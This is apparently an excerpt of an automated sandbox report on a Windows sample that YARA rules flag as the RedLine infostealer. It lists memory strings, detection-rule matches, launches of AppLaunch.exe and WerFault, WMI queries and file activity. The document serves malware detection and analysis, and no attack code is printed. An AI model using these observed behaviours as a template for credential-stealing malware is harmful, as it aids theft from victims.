                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: file.exe, file.exe, 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: file.exe, 00000000.00000000.295523429.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.file.exe.9f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.3.file.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.file.exe.a22780.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.file.exe.9f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.3.file.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.file.exe.a22780.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F34700_2_009F3470
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FD80B0_2_009FD80B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F83A0_2_00A0F83A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A000500_2_00A00050
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A09A190_2_00A09A19
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A114830_2_00A11483
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A115A30_2_00A115A3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0DDBE0_2_00A0DDBE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A047D90_2_00A047D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09CC4B382_2_09CC4B38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09CC0C082_2_09CC0C08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09CC30B82_2_09CC30B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09CC53B02_2_09CC53B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3182682_2_0A318268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3170C02_2_0A3170C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3199982_2_0A319998
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3161D92_2_0A3161D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3177002_2_0A317700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A315A7A2_2_0A315A7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3182582_2_0A318258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3100322_2_0A310032
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3108182_2_0A310818
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3108082_2_0A310808
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3100402_2_0A310040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3170B02_2_0A3170B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A31A0E02_2_0A31A0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3149622_2_0A314962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A310F002_2_0A310F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A311FD82_2_0A311FD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A311FC82_2_0A311FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3124402_2_0A312440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0A3155702_2_0A315570
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 009F93D0 appears 48 times
                      Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                      Source: file.exe, 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRedeemably.exe4 vs file.exe
                      Source: file.exeVirustotal: Detection: 35%
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
